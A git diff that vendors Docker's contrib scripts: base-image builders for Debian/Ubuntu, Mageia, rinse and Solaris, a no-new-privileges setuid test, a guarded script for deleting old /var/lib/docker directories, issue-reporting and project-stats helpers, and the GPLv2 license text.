+# in-use kernel, which doesn't really apply to debootstraps/Docker images that
+# don't even have kernels installed
+rm -f "$rootfsDir/etc/apt/apt.conf.d/01autoremove-kernels"
+
+# Ubuntu 10.04 sucks... :)
+if strings "$rootfsDir/usr/bin/dpkg" | grep -q unsafe-io; then
+	# force dpkg not to call sync() after package extraction (speeding up installs)
+	echo >&2 "+ echo force-unsafe-io > '$rootfsDir/etc/dpkg/dpkg.cfg.d/docker-apt-speedup'"
+	cat > "$rootfsDir/etc/dpkg/dpkg.cfg.d/docker-apt-speedup" <<-'EOF'
+		# For most Docker users, package installs happen during "docker build", which
+		# doesn't survive power loss and gets restarted clean afterwards anyhow, so
+		# this minor tweak gives us a nice speedup (much nicer on spinning disks,
+		# obviously).
+
+		force-unsafe-io
+	EOF
+fi
+
+if [ -d "$rootfsDir/etc/apt/apt.conf.d" ]; then
+	# _keep_ us lean by effectively running "apt-get clean" after every install
+	aptGetClean='"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true";'
+	echo >&2 "+ cat > '$rootfsDir/etc/apt/apt.conf.d/docker-clean'"
+	cat > "$rootfsDir/etc/apt/apt.conf.d/docker-clean" <<-EOF
+		# Since for most Docker users, package installs happen in "docker build" steps,
+		# they essentially become individual layers due to the way Docker handles
+		# layering, especially using CoW filesystems.  What this means for us is that
+		# the caches that APT keeps end up just wasting space in those layers, making
+		# our layers unnecessarily large (especially since we'll normally never use
+		# these caches again and will instead just "docker build" again and make a brand
+		# new image).
+
+		# Ideally, these would just be invoking "apt-get clean", but in our testing,
+		# that ended up being cyclic and we got stuck on APT's lock, so we get this fun
+		# creation that's essentially just "apt-get clean".
+		DPkg::Post-Invoke { ${aptGetClean} };
+		APT::Update::Post-Invoke { ${aptGetClean} };
+
+		Dir::Cache::pkgcache "";
+		Dir::Cache::srcpkgcache "";
+
+		# Note that we do realize this isn't the ideal way to do this, and are always
+		# open to better suggestions (https://github.com/docker/docker/issues).
+	EOF
+
+	# remove apt-cache translations for fast "apt-get update"
+	echo >&2 "+ echo Acquire::Languages 'none' > '$rootfsDir/etc/apt/apt.conf.d/docker-no-languages'"
+	cat > "$rootfsDir/etc/apt/apt.conf.d/docker-no-languages" <<-'EOF'
+		# In Docker, we don't often need the "Translations" files, so we're just wasting
+		# time and space by downloading them, and this inhibits that.  For users that do
+		# need them, it's a simple matter to delete this file and "apt-get update". :)
+
+		Acquire::Languages "none";
+	EOF
+
+	echo >&2 "+ echo Acquire::GzipIndexes 'true' > '$rootfsDir/etc/apt/apt.conf.d/docker-gzip-indexes'"
+	cat > "$rootfsDir/etc/apt/apt.conf.d/docker-gzip-indexes" <<-'EOF'
+		# Since Docker users using "RUN apt-get update && apt-get install -y ..." in
+		# their Dockerfiles don't go delete the lists files afterwards, we want them to
+		# be as small as possible on-disk, so we explicitly request "gz" versions and
+		# tell Apt to keep them gzipped on-disk.
+
+		# For comparison, an "apt-get update" layer without this on a pristine
+		# "debian:wheezy" base image was "29.88 MB", where with this it was only
+		# "8.273 MB".
+
+		Acquire::GzipIndexes "true";
+		Acquire::CompressionTypes::Order:: "gz";
+	EOF
+
+	# update "autoremove" configuration to be aggressive about removing suggests deps that weren't manually installed
+	echo >&2 "+ echo Apt::AutoRemove::SuggestsImportant 'false' > '$rootfsDir/etc/apt/apt.conf.d/docker-autoremove-suggests'"
+	cat > "$rootfsDir/etc/apt/apt.conf.d/docker-autoremove-suggests" <<-'EOF'
+		# Since Docker users are looking for the smallest possible final images, the
+		# following emerges as a very common pattern:
+
+		#   RUN apt-get update \
+		#       && apt-get install -y <packages> \
+		#       && <do some compilation work> \
+		#       && apt-get purge -y --auto-remove <packages>
+
+		# By default, APT will actually _keep_ packages installed via Recommends or
+		# Depends if another package Suggests them, even and including if the package
+		# that originally caused them to be installed is removed.  Setting this to
+		# "false" ensures that APT is appropriately aggressive about removing the
+		# packages it added.
+
+		# https://aptitude.alioth.debian.org/doc/en/ch02s05s05.html#configApt-AutoRemove-SuggestsImportant
+		Apt::AutoRemove::SuggestsImportant "false";
+	EOF
+fi
+
+if [ -z "$DONT_TOUCH_SOURCES_LIST" ]; then
+	# tweak sources.list, where appropriate
+	lsbDist=
+	if [ -z "$lsbDist" -a -r "$rootfsDir/etc/os-release" ]; then
+		lsbDist="$(. "$rootfsDir/etc/os-release" && echo "$ID")"
+	fi
+	if [ -z "$lsbDist" -a -r "$rootfsDir/etc/lsb-release" ]; then
+		lsbDist="$(. "$rootfsDir/etc/lsb-release" && echo "$DISTRIB_ID")"
+	fi
+	if [ -z "$lsbDist" -a -r "$rootfsDir/etc/debian_version" ]; then
+		lsbDist='Debian'
+	fi
+	# normalize to lowercase for easier matching
+	lsbDist="$(echo "$lsbDist" | tr '[:upper:]' '[:lower:]')"
+	case "$lsbDist" in
+		debian)
+			# updates and security!
+			if [ "$suite" != 'sid' -a "$suite" != 'unstable' ]; then
+				(
+					set -x
+					sed -i "
+						p;
+						s/ $suite / ${suite}-updates /
+					" "$rootfsDir/etc/apt/sources.list"
+					echo "deb http://security.debian.org $suite/updates main" >> "$rootfsDir/etc/apt/sources.list"
+				)
+			fi
+			;;
+		ubuntu)
+			# add the updates and security repositories
+			(
+				set -x
+				sed -i "
+					p;
+					s/ $suite / ${suite}-updates /; p;
+					s/ $suite-updates / ${suite}-security /
+				" "$rootfsDir/etc/apt/sources.list"
+			)
+			;;
+		tanglu)
+			# add the updates repository
+			if [ "$suite" != 'devel' ]; then
+				(
+					set -x
+					sed -i "
+						p;
+						s/ $suite / ${suite}-updates /
+					" "$rootfsDir/etc/apt/sources.list"
+				)
+			fi
+			;;
+		steamos)
+			# add contrib and non-free if "main" is the only component
+			(
+				set -x
+				sed -i "s/ $suite main$/ $suite main contrib non-free/" "$rootfsDir/etc/apt/sources.list"
+			)
+			;;
+	esac
+fi
+
+(
+	set -x
+
+	# make sure we're fully up-to-date
+	rootfs_chroot sh -xc 'apt-get update && apt-get dist-upgrade -y'
+
+	# delete all the apt list files since they're big and get stale quickly
+	rm -rf "$rootfsDir/var/lib/apt/lists"/*
+	# this forces "apt-get update" in dependent images, which is also good
+
+	mkdir "$rootfsDir/var/lib/apt/lists/partial" # Lucid... "E: Lists directory /var/lib/apt/lists/partial is missing."
+)
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi b/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi
new file mode 100755
index 0000000000..93fb289cac
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi
@@ -0,0 +1,61 @@
+#!/usr/bin/env bash
+#
+# Needs to be run from Mageia 4 or greater for kernel support for docker.
+#
+# Mageia 4 does not have docker available in official repos, so please
+# install and run the docker binary manually.
+#
+# Tested working versions are for Mageia 2 onwards (inc. cauldron).
+#
+set -e
+
+rootfsDir="$1"
+shift
+
+optTemp=$(getopt --options '+v:,m:' --longoptions 'version:,mirror:' --name mageia-urpmi -- "$@")
+eval set -- "$optTemp"
+unset optTemp
+
+installversion=
+mirror=
+while true; do
+	case "$1" in
+		-v|--version) installversion="$2" ; shift 2 ;;
+		-m|--mirror) mirror="$2" ; shift 2 ;;
+		--) shift ; break ;;
+	esac
+done
+
+if [ -z $installversion ]; then
+	# Attempt to match host version
+	if [ -r /etc/mageia-release ]; then
+		installversion="$(sed 's/^[^0-9\]*\([0-9.]\+\).*$/\1/' /etc/mageia-release)"
+	else
+		echo "Error: no version supplied and unable to detect host mageia version"
+		exit 1
+	fi
+fi
+
+if [ -z $mirror ]; then
+	# No mirror provided, default to mirrorlist
+	mirror="--mirrorlist https://mirrors.mageia.org/api/mageia.$installversion.x86_64.list"
+fi
+
+(
+	set -x
+	urpmi.addmedia --distrib \
+		$mirror \
+		--urpmi-root "$rootfsDir"
+	urpmi basesystem-minimal urpmi \
+		--auto \
+		--no-suggests \
+		--urpmi-root "$rootfsDir" \
+		--root "$rootfsDir"
+)
+
+"$(dirname "$BASH_SOURCE")/.febootstrap-minimize" "$rootfsDir"
+
+if [ -d "$rootfsDir/etc/sysconfig" ]; then
+	# allow networking init scripts inside the container to work without extra steps
+	echo 'NETWORKING=yes' > "$rootfsDir/etc/sysconfig/network"
+fi
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/rinse b/vendor/github.com/docker/docker/contrib/mkimage/rinse
new file mode 100755
index 0000000000..75eb4f0d9d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage/rinse
@@ -0,0 +1,25 @@
+#!/usr/bin/env bash
+set -e
+
+rootfsDir="$1"
+shift
+
+# specifying --arch below is safe because "$@" can override it and the "latest" one wins :)
+
+(
+	set -x
+	rinse --directory "$rootfsDir" --arch amd64 "$@"
+)
+
+"$(dirname "$BASH_SOURCE")/.febootstrap-minimize" "$rootfsDir"
+
+if [ -d "$rootfsDir/etc/sysconfig" ]; then
+	# allow networking init scripts inside the container to work without extra steps
+	echo 'NETWORKING=yes' > "$rootfsDir/etc/sysconfig/network"
+fi
+
+# make sure we're fully up-to-date, too
+(
+	set -x
+	chroot "$rootfsDir" yum update -y
+)
diff --git a/vendor/github.com/docker/docker/contrib/mkimage/solaris b/vendor/github.com/docker/docker/contrib/mkimage/solaris
new file mode 100755
index 0000000000..158970e69e
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/mkimage/solaris
@@ -0,0 +1,89 @@
+#!/usr/bin/env bash
+#
+# Solaris 12 base image build script. 
+#
+set -e
+
+# TODO add optional package publisher origin
+
+rootfsDir="$1"
+shift
+
+# base install
+(
+	set -x
+
+	pkg image-create --full --zone \
+		--facet facet.locale.*=false \
+		--facet facet.locale.POSIX=true \
+		--facet facet.doc=false \
+		--facet facet.doc.*=false \
+		"$rootfsDir"
+
+	pkg -R "$rootfsDir" set-property use-system-repo true
+
+	pkg -R "$rootfsDir" set-property flush-content-cache-on-success true
+
+	pkg -R "$rootfsDir" install core-os
+)
+
+# Lay in stock configuration, set up milestone
+# XXX This all may become optional in a base image
+(
+	# faster to build repository database on tmpfs
+	REPO_DB=/system/volatile/repository.$$
+	export SVCCFG_REPOSITORY=${REPO_DB}
+	export SVCCFG_DOOR_PATH=$rootfsDir/system/volatile/tmp_repo_door
+
+	# Import base manifests. NOTE These are a combination of basic requirement
+	# and gleaned from container milestone manifest. They may change.
+	for m in $rootfsDir/lib/svc/manifest/system/environment.xml \
+		$rootfsDir/lib/svc/manifest/system/svc/global.xml \
+		$rootfsDir/lib/svc/manifest/system/svc/restarter.xml \
+		$rootfsDir/lib/svc/manifest/network/dns/client.xml \
+		$rootfsDir/lib/svc/manifest/system/name-service/switch.xml \
+		$rootfsDir/lib/svc/manifest/system/name-service/cache.xml \
+		$rootfsDir/lib/svc/manifest/milestone/container.xml ; do
+		svccfg import $m
+	done
+
+	# Apply system layer profile, deleting unnecessary dependencies
+	svccfg apply $rootfsDir/etc/svc/profile/generic_container.xml 
+
+	# XXX Even if we keep a repo in the base image, this is definitely optional
+	svccfg apply $rootfsDir/etc/svc/profile/sysconfig/container_sc.xml
+
+	for s in svc:/system/svc/restarter \
+		svc:/system/environment \
+		svc:/network/dns/client \
+		svc:/system/name-service/switch \
+		svc:/system/name-service/cache \
+		svc:/system/svc/global \
+		svc:/milestone/container ;do
+		svccfg -s $s refresh
+	done
+
+	# now copy the built up repository into the base rootfs
+	mv $REPO_DB $rootfsDir/etc/svc/repository.db
+)
+
+# pkg(1) needs the zoneproxy-client running in the container.
+# use a simple wrapper to run it as needed.
+# XXX maybe we go back to running this in SMF?
+mv "$rootfsDir/usr/bin/pkg" "$rootfsDir/usr/bin/wrapped_pkg"
+cat > "$rootfsDir/usr/bin/pkg" <<-'EOF'
+#!/bin/sh
+#
+# THIS FILE CREATED DURING DOCKER BASE IMAGE CREATION
+# 
+# The Solaris base image uses the sysrepo proxy mechanism. The
+# IPS client pkg(1) requires the zoneproxy-client to reach the
+# remote publisher origins through the host. This wrapper script
+# enables and disables the proxy client as needed. This is a
+# temporary solution.
+
+/usr/lib/zones/zoneproxy-client -s localhost:1008
+PKG_SYSREPO_URL=http://localhost:1008 /usr/bin/wrapped_pkg "$@"
+pkill -9 zoneproxy-client
+EOF
+chmod +x "$rootfsDir/usr/bin/pkg"
diff --git a/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile b/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile
new file mode 100644
index 0000000000..026d86954f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile
@@ -0,0 +1,9 @@
+FROM buildpack-deps:jessie
+
+COPY . /usr/src/
+
+WORKDIR /usr/src/
+
+RUN gcc -g -Wall -static nnp-test.c -o /usr/bin/nnp-test
+
+RUN chmod +s /usr/bin/nnp-test
diff --git a/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c b/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c
new file mode 100644
index 0000000000..b767da7e1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/types.h>
+
+int main(int argc, char *argv[])
+{
+        printf("EUID=%d\n", geteuid());
+        return 0;
+}
+
diff --git a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh
new file mode 100755
index 0000000000..5eeb45c8bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh
@@ -0,0 +1,64 @@
+#!/bin/sh
+set -e
+
+dir="$1"
+
+if [ -z "$dir" ]; then
+	{
+		echo 'This script is for destroying old /var/lib/docker directories more safely than'
+		echo '  "rm -rf", which can cause data loss or other serious issues.'
+		echo
+		echo "usage: $0 directory"
+		echo "   ie: $0 /var/lib/docker"
+	} >&2
+	exit 1
+fi
+
+if [ "$(id -u)" != 0 ]; then
+	echo >&2 "error: $0 must be run as root"
+	exit 1
+fi
+
+if [ ! -d "$dir" ]; then
+	echo >&2 "error: $dir is not a directory"
+	exit 1
+fi
+
+dir="$(readlink -f "$dir")"
+
+echo
+echo "Nuking $dir ..."
+echo '  (if this is wrong, press Ctrl+C NOW!)'
+echo
+
+( set -x; sleep 10 )
+echo
+
+dir_in_dir() {
+	inner="$1"
+	outer="$2"
+	[ "${inner#$outer}" != "$inner" ]
+}
+
+# let's start by unmounting any submounts in $dir
+#   (like -v /home:... for example - DON'T DELETE MY HOME DIRECTORY BRU!)
+for mount in $(awk '{ print $5 }' /proc/self/mountinfo); do
+	mount="$(readlink -f "$mount" || true)"
+	if [ "$dir" != "$mount" ] && dir_in_dir "$mount" "$dir"; then
+		( set -x; umount -f "$mount" )
+	fi
+done
+
+# now, let's go destroy individual btrfs subvolumes, if any exist
+if command -v btrfs > /dev/null 2>&1; then
+	# Find btrfs subvolumes under $dir checking for inode 256
+	# Source: http://stackoverflow.com/a/32865333
+	for subvol in $(find "$dir" -type d -inum 256 | sort -r); do
+		if [ "$dir" != "$subvol" ]; then
+			( set -x; btrfs subvolume delete "$subvol" )
+		fi
+	done
+fi
+
+# finally, DESTROY ALL THINGS
+( shopt -s dotglob; set -x; rm -rf "$dir"/* )
diff --git a/vendor/github.com/docker/docker/contrib/project-stats.sh b/vendor/github.com/docker/docker/contrib/project-stats.sh
new file mode 100755
index 0000000000..2691c72ffb
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/project-stats.sh
@@ -0,0 +1,22 @@
+#!/usr/bin/env bash
+
+## Run this script from the root of the docker repository
+## to query project stats useful to the maintainers.
+## You will need to install `pulls` and `issues` from
+## https://github.com/crosbymichael/pulls
+
+set -e
+
+echo -n "Open pulls: "
+PULLS=$(pulls | wc -l); let PULLS=$PULLS-1
+echo $PULLS
+
+echo -n "Pulls alru: "
+pulls alru
+
+echo -n "Open issues: "
+ISSUES=$(issues list | wc -l); let ISSUES=$ISSUES-1
+echo $ISSUES
+
+echo -n "Issues alru: "
+issues alru
diff --git a/vendor/github.com/docker/docker/contrib/report-issue.sh b/vendor/github.com/docker/docker/contrib/report-issue.sh
new file mode 100755
index 0000000000..cb54f1a5bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/report-issue.sh
@@ -0,0 +1,105 @@
+#!/bin/sh
+
+# This is a convenience script for reporting issues that include a base
+# template of information. See https://github.com/docker/docker/pull/8845
+
+set -e
+
+DOCKER_ISSUE_URL=${DOCKER_ISSUE_URL:-"https://github.com/docker/docker/issues/new"}
+DOCKER_ISSUE_NAME_PREFIX=${DOCKER_ISSUE_NAME_PREFIX:-"Report: "}
+DOCKER=${DOCKER:-"docker"}
+DOCKER_COMMAND="${DOCKER}"
+export DOCKER_COMMAND
+
+# pulled from https://gist.github.com/cdown/1163649
+function urlencode() {
+	# urlencode <string>
+
+	local length="${#1}"
+	for (( i = 0; i < length; i++ )); do
+			local c="${1:i:1}"
+			case $c in
+					[a-zA-Z0-9.~_-]) printf "$c" ;;
+					*) printf '%%%02X' "'$c"
+			esac
+	done
+}
+
+function template() {
+# this should always match the template from CONTRIBUTING.md
+	cat <<- EOM
+	Description of problem:
+
+
+	\`docker version\`:
+	`${DOCKER_COMMAND} -D version`
+
+
+	\`docker info\`:
+	`${DOCKER_COMMAND} -D info`
+
+
+	\`uname -a\`:
+	`uname -a`
+
+
+	Environment details (AWS, VirtualBox, physical, etc.):
+
+
+	How reproducible:
+
+
+	Steps to Reproduce:
+	1.
+	2.
+	3.
+
+
+	Actual Results:
+
+
+	Expected Results:
+
+
+	Additional info:
+
+
+	EOM
+}
+
+function format_issue_url() {
+	if [ ${#@} -ne 2 ] ; then
+		return 1
+	fi
+	local issue_name=$(urlencode "${DOCKER_ISSUE_NAME_PREFIX}${1}")
+	local issue_body=$(urlencode "${2}")
+	echo "${DOCKER_ISSUE_URL}?title=${issue_name}&body=${issue_body}"
+}
+
+
+echo -ne "Do you use \`sudo\` to call docker? [y|N]: "
+read -r -n 1 use_sudo
+echo ""
+
+if [ "x${use_sudo}" = "xy" -o "x${use_sudo}" = "xY" ]; then
+	export DOCKER_COMMAND="sudo ${DOCKER}"
+fi
+
+echo -ne "Title of new issue?: "
+read -r issue_title
+echo ""
+
+issue_url=$(format_issue_url "${issue_title}" "$(template)")
+
+if which xdg-open 2>/dev/null >/dev/null ; then
+	echo -ne "Would like to launch this report in your browser? [Y|n]: "
+	read -r -n 1 launch_now
+	echo ""
+
+	if [ "${launch_now}" != "n" -a "${launch_now}" != "N" ]; then
+		xdg-open "${issue_url}"
+	fi
+fi
+
+echo "If you would like to manually open the url, you can open this link if your browser: ${issue_url}"
+
diff --git a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh
new file mode 100755
index 0000000000..9ecf99d465
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+set -e
+
+cd "$(dirname "$BASH_SOURCE")/../.."
+
+targets_from() {
+       git fetch -q https://github.com/docker/docker.git "$1"
+       git ls-tree -r --name-only "$(git rev-parse FETCH_HEAD)" contrib/builder/deb/ | grep '/Dockerfile$' | sed -r 's!^contrib/builder/deb/|^contrib/builder/deb/amd64/|-debootstrap|/Dockerfile$!!g' | grep -v /
+}
+
+release_branch=$(git ls-remote --heads https://github.com/docker/docker.git | awk -F 'refs/heads/' '$2 ~ /^release/ { print $2 }' | sort -V | tail -1)
+{ targets_from master; targets_from "$release_branch"; } | sort -u
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE
new file mode 100644
index 0000000000..d511905c16
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE
@@ -0,0 +1,339 @@
+		    GNU GENERAL PUBLIC LICENSE
+		       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+		    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+			    NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
